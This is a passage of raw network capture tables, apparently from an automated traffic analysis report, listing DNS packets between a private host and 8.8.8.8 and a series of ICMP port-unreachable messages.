                                    Sep 1, 2022 00:03:08.672029018 CEST53608168.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:08.720036983 CEST6081753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:08.740346909 CEST53608178.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:08.745096922 CEST6081853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:08.766110897 CEST53608188.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:08.807703018 CEST6081953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:08.827946901 CEST53608198.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:08.828383923 CEST6082053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:08.846530914 CEST53608208.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:08.846909046 CEST6082153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:08.866904974 CEST53608218.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:11.312613964 CEST6242453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:11.907406092 CEST53624248.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:13.124238968 CEST6242553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:13.145453930 CEST53624258.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:13.145962954 CEST6242653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:13.167514086 CEST53624268.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:13.168036938 CEST6242753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:13.187902927 CEST53624278.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:13.188986063 CEST6242853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:13.209469080 CEST53624288.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:13.209944010 CEST6242953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:13.232753992 CEST53624298.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:13.699589014 CEST6112653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:14.710131884 CEST6112653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:15.711199999 CEST6112653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:15.875538111 CEST53611268.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:15.883177996 CEST6112753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:15.886709929 CEST53611268.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:15.902874947 CEST53611278.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:15.903464079 CEST6112853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:15.921664953 CEST53611288.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:15.922110081 CEST6112953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:15.941783905 CEST53611298.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:15.942186117 CEST6113053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:15.960310936 CEST53611308.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:15.960644960 CEST6113153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:15.978528023 CEST53611318.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:16.393064976 CEST5539053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:17.397872925 CEST5539053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:17.783536911 CEST53611268.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:17.989558935 CEST53553908.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:18.001125097 CEST5891353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:18.019994974 CEST53589138.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:18.020601034 CEST5891453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:18.040131092 CEST53589148.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:18.040652990 CEST5891553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:18.060370922 CEST53589158.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:18.060822964 CEST5891653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:18.080894947 CEST53589168.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:18.082511902 CEST5891753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:18.102590084 CEST53589178.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:18.621407986 CEST5062253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:18.650096893 CEST53506228.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:18.657192945 CEST5062353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:18.676616907 CEST53506238.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:18.677170992 CEST5062453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:18.696774960 CEST53506248.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:18.697258949 CEST5062553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:18.717092037 CEST53506258.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:18.717463970 CEST5062653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:18.736999989 CEST53506268.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:18.737468004 CEST5062753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:18.754909992 CEST53506278.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:19.167845011 CEST5564953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:19.210956097 CEST53556498.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:19.219196081 CEST5565053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:19.238610029 CEST53556508.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:19.239136934 CEST5565153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:19.258774996 CEST53556518.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:19.259211063 CEST5565253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:19.276746988 CEST53556528.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:19.277164936 CEST5565353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:19.296673059 CEST53556538.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:19.297074080 CEST5565453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:19.316821098 CEST53556548.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:19.696104050 CEST53553908.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:19.834583998 CEST6437653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:19.938867092 CEST53643768.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:19.952431917 CEST6437753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:19.971436024 CEST53643778.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:19.972138882 CEST6437853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:19.991856098 CEST53643788.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:19.992460012 CEST6437953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:20.010216951 CEST53643798.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:20.011368036 CEST6438053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:20.031111956 CEST53643808.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:20.034172058 CEST6438153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:20.051709890 CEST53643818.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:20.228393078 CEST5211053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:20.256568909 CEST53521108.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:20.265758991 CEST5211153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:20.283133984 CEST53521118.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:20.284135103 CEST5211253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:20.303747892 CEST53521128.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:20.304409027 CEST5211353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:20.323898077 CEST53521138.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:20.324394941 CEST5211453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:20.344026089 CEST53521148.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:20.348262072 CEST5211553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:20.366065979 CEST53521158.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:20.534615040 CEST6368753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:21.523137093 CEST6368753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:21.609051943 CEST53636878.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:21.620418072 CEST6368853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:21.641108990 CEST53636888.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:21.642301083 CEST6368953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:21.663789988 CEST53636898.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:21.664385080 CEST6369053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:21.686964035 CEST53636908.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:21.687511921 CEST6369153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:21.708765030 CEST53636918.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:21.709351063 CEST6369253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:21.729496956 CEST53636928.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:21.888966084 CEST5782453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:22.898207903 CEST5782453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:22.926181078 CEST53578248.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:22.935939074 CEST5782553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:22.956406116 CEST53578258.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:22.956962109 CEST5782653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:22.978058100 CEST53578268.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:22.978908062 CEST5782753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:22.999502897 CEST53578278.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:23.000022888 CEST5782853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:23.021095037 CEST53578288.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:23.021548986 CEST5782953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:23.042824030 CEST53578298.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:23.209656954 CEST5274153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:23.514621973 CEST53578248.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:23.968266010 CEST53527418.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:23.980442047 CEST5274253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:23.997780085 CEST53527428.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:23.998657942 CEST5274353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:24.018424988 CEST53527438.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:24.019182920 CEST5274453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:24.039185047 CEST53527448.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:24.040007114 CEST5274553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:24.059684038 CEST53527458.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:24.060420036 CEST5274653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:24.078253031 CEST53527468.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:24.239500046 CEST6064453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:25.226500988 CEST6064453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:25.255103111 CEST53606448.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:25.263760090 CEST6064553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:25.281069994 CEST53606458.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:25.281759977 CEST6064653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:25.299524069 CEST53606468.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:25.300157070 CEST6064753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:25.319861889 CEST53606478.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:25.320561886 CEST6064853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:25.340485096 CEST53606488.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:25.341169119 CEST6064953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:25.361062050 CEST53606498.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:25.538189888 CEST5595153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:25.566684961 CEST53559518.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:25.576621056 CEST5595253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:25.593641996 CEST53559528.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:25.594151020 CEST5595353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:25.611632109 CEST53559538.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:25.612011909 CEST5595453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:25.631575108 CEST53559548.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:25.632008076 CEST5595553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:25.649888039 CEST53559558.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:25.650229931 CEST5595653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:25.669991970 CEST53559568.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:25.840779066 CEST5159253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:25.946975946 CEST53606448.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:26.542138100 CEST53636878.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:26.836159945 CEST5159253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:26.874851942 CEST53515928.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:26.882740974 CEST5159353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:26.904150963 CEST53515938.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:26.907030106 CEST5159453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:26.929198980 CEST53515948.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:26.929732084 CEST5159553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:26.951956987 CEST53515958.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:26.954768896 CEST5159653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:26.976304054 CEST53515968.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:26.976847887 CEST5159753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:26.997859001 CEST53515978.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:26.998966932 CEST53515928.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:27.174635887 CEST6135953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:28.164587021 CEST6135953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:28.328942060 CEST53613598.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:28.343839884 CEST6136053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:28.362921000 CEST53613608.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:28.363595009 CEST6136153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:28.383085012 CEST53613618.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:28.520062923 CEST6136253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:28.538108110 CEST53613628.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:28.538480043 CEST6136353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:28.558254004 CEST53613638.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:28.558638096 CEST6136453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:28.578342915 CEST53613648.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:28.692234039 CEST53613598.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:28.762604952 CEST5848053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:29.338186979 CEST53584808.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:29.344712973 CEST5848153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:29.362001896 CEST53584818.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:29.362481117 CEST5848253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:29.383466005 CEST53584828.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:29.383908987 CEST5848353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:29.401654959 CEST53584838.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:29.402066946 CEST5848453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:29.423216105 CEST53584848.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:30.012593985 CEST5848553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:30.033303976 CEST53584858.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:30.204734087 CEST5188953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:30.819206953 CEST53518898.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:30.891808033 CEST5189053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:30.911178112 CEST53518908.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:31.975245953 CEST5189153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:31.996062040 CEST53518918.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:31.996526957 CEST5189253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:32.016911030 CEST53518928.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:32.036712885 CEST5189353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:32.055161953 CEST53518938.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:32.055555105 CEST5189453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:32.077513933 CEST53518948.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:32.280885935 CEST6041853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:32.328344107 CEST53604188.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:32.339962959 CEST6041953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:32.360487938 CEST53604198.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:32.361099958 CEST6042053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:32.381845951 CEST53604208.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:32.382333040 CEST6042153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:32.402843952 CEST53604218.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:32.403374910 CEST6042253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:32.423881054 CEST53604228.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:32.424187899 CEST6042353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:32.444027901 CEST53604238.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:32.614773035 CEST5428353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:33.602144957 CEST5428353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:33.662503004 CEST53542838.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:33.674870014 CEST5428453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:33.694170952 CEST53542848.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:33.695070028 CEST5428553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:33.714600086 CEST53542858.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:33.715890884 CEST5428653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:33.735584974 CEST53542868.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:33.736226082 CEST5428753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:33.755711079 CEST53542878.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:33.756469965 CEST5428853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:33.774130106 CEST53542888.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:33.940355062 CEST5976353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:34.005925894 CEST53597638.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:34.015136957 CEST5976453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:34.032443047 CEST53597648.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:34.032989979 CEST5976553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:34.052963972 CEST53597658.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:34.053456068 CEST5976653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:34.075452089 CEST53597668.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:34.075906992 CEST5976753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:34.093806982 CEST53597678.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:34.095324039 CEST5976853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:34.114725113 CEST53597688.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:34.286489964 CEST5443153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:34.727765083 CEST53542838.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:35.289774895 CEST5443153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:35.952977896 CEST53544318.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:35.959451914 CEST5443253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:35.979208946 CEST53544328.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:35.979600906 CEST5443353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:36.000792027 CEST53544338.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:36.001168966 CEST5443453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:36.022969007 CEST53544348.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:36.023380995 CEST5443553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:36.044903994 CEST53544358.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:36.045305967 CEST5443653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:36.066387892 CEST53544368.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:36.244251013 CEST6546153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:37.243447065 CEST6546153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:37.278584003 CEST53654618.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:37.287781000 CEST6546253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:37.308661938 CEST53654628.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:37.309587002 CEST6546353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:37.330910921 CEST53654638.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:37.331573009 CEST6546453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:37.351093054 CEST53654648.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:37.351948977 CEST6546553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:37.372787952 CEST53654658.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:37.373698950 CEST6546653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:37.393057108 CEST53654668.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:37.563853979 CEST5009053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:38.572907925 CEST5009053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:38.649069071 CEST53500908.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:38.657994032 CEST5009153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:38.677830935 CEST53500918.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:38.678469896 CEST5009253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:38.699517965 CEST53500928.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:38.699985027 CEST5009353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:38.719789982 CEST53500938.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:38.722516060 CEST5009453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:38.740737915 CEST53500948.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:38.741457939 CEST5009553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:38.761935949 CEST53500958.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:39.094896078 CEST53544318.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:40.677587986 CEST53500908.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:41.002669096 CEST53654618.8.8.8192.168.2.3
                                    TimestampSource IPDest IPChecksumCodeType
                                    Sep 1, 2022 00:01:39.520570993 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:01:40.783612013 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:01:50.793490887 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:01:52.259394884 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:01.915915966 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:11.967726946 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:12.999253988 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:14.387639999 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:17.505326033 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:18.912524939 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:19.930841923 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:22.074431896 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:26.716536045 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:27.817651033 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:33.986866951 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:39.027971983 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:42.283472061 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:47.096530914 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:53.169331074 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:54.727473974 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:02:57.449881077 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:03:01.595396042 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:03:02.946669102 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:03:03.968327999 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:03:06.090796947 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:03:15.886845112 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:03:17.783652067 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:03:19.698307991 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:03:23.514821053 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:03:25.947057962 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:03:26.542293072 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:03:28.692326069 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:03:34.727960110 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:03:39.095027924 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    Sep 1, 2022 00:03:40.678124905 CEST192.168.2.38.8.8.8d030(Port unreachable)Destination Unreachable
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
